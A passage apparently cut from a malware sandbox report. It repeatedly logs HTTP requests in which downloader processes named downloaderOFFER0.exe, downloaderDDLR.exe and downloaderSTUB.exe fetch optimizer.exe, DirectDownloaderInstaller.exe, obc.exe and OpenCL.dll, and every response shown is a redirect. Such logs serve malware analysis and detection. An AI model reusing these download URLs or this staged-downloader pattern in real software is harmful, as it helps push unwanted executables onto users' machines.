    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 67
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 67
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 67
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 67
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 67
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 67
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 67
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 67
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 67
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 67
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 67
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:45 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 68
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 67
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 68
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:45 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 71
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 68
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:45 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 68
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:45 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 68
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:45 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 68
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:45 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 68
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:45 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:45 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:46 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:45 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 69
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:46 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:46 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:46 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 72
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:46 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:47 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:47 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:47 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
